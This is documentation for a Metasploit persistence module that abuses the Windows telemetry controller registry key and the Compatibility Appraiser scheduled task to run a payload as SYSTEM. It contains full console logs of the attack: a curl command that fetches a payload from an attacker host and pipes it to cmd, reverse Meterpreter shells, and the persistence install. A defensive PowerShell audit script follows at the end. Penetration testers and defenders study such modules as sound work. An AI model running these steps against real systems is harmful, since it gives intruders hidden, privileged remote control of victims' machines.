Path: blob/master/documentation/modules/exploit/windows/persistence/telemetry.md
## Vulnerable Application

This persistence mechanism installs a new telemetry provider for Windows. If telemetry is turned on, the scheduled task that launches the telemetry provider will run our payload with SYSTEM permissions.
## Verification Steps

1. Start msfconsole
1. Get an admin level shell on Windows
1. Do: `use exploit/windows/persistence/telemetry`
1. Do: `set session #`
1. Do: `run`
1. You should get a shell when the scheduled task runs.
## Options

**PAYLOAD_NAME**

Name of payload file to write. Random string as default.

**NAME**

Name of the telemetry program. Random string as default.
## Scenarios

### Windows 10 1909 (10.0 Build 18363)

#### Get an admin level shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
#### Install persistence

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set session 1
session => 1
msf exploit(windows/persistence/telemetry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/telemetry) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Appraiser name found: Microsoft Compatibility Appraiser
[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
[+] The target is vulnerable. Registry writable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
[*] Using telemetry id: uYmoknDG
[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user) or wait till 1/4/2026 4:10:25 AM (SYSTEM)
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
```
#### Trigger the scheduled task instead of waiting

```
msf exploit(windows/persistence/telemetry) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2344 created.
Channel 4 created.
Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".

C:\WINDOWS\system32>exit
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/telemetry) > date
[*] exec: date

Sat Jan  3 01:30:05 PM EST 2026
msf exploit(windows/persistence/telemetry) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500
msf exploit(windows/persistence/telemetry) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)
```
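A defender-side check of the two artifacts the install log above exposes, the `TelemetryController` registry key the module writes under and the Microsoft Compatibility Appraiser task that runs `CompatTelRunner.exe`. This is an added PowerShell example, not code from the module or its documentation; the rule that a provider command naming an executable outside `%SystemRoot%` is suspicious is an assumption of the example.

```powershell
# Added example, not part of the Metasploit module or its documentation.
# Audits the key the module writes under (shown in the install log above) and
# the scheduled task that runs CompatTelRunner.exe, from a defender's side.
$KeyPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController'
$MetaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-TelemetryControllerFindings {
    param([string]$Path = $KeyPath)
    $findings = @()
    if (-not (Test-Path -Path $Path)) { return $findings }   # key absent: nothing installed here
    foreach ($sub in Get-ChildItem -Path $Path) {
        $props = Get-ItemProperty -Path $sub.PSPath
        foreach ($p in $props.PSObject.Properties) {
            if ($MetaProps -contains $p.Name) { continue }   # PowerShell metadata, not registry data
            if ($p.Value -isnot [string]) { continue }
            # Assumption: a provider command that names an executable outside %SystemRoot%
            # is suspicious. The module above dropped its payload in a user's %TEMP%.
            $expanded = [System.Environment]::ExpandEnvironmentVariables($p.Value)
            if ($expanded -match '\.exe' -and $expanded -notlike "$env:SystemRoot*") {
                $findings += [pscustomobject]@{
                    Provider = $sub.PSChildName
                    Value    = $p.Name
                    Data     = $p.Value
                }
            }
        }
    }
    return $findings
}

# Provider entries whose command points outside the Windows directory.
Get-TelemetryControllerFindings | Format-Table -AutoSize

# When the trigger task last ran and when it is next due; the module reports the
# same "next scheduled runtime" before installing.
Get-ScheduledTaskInfo -TaskPath '\Microsoft\Windows\Application Experience\' `
                      -TaskName 'Microsoft Compatibility Appraiser' |
    Select-Object TaskName, LastRunTime, NextRunTime, LastTaskResult
```

Run it from an elevated PowerShell on the host; after the cleanup RC file from the log has been replayed, the findings table should come back empty.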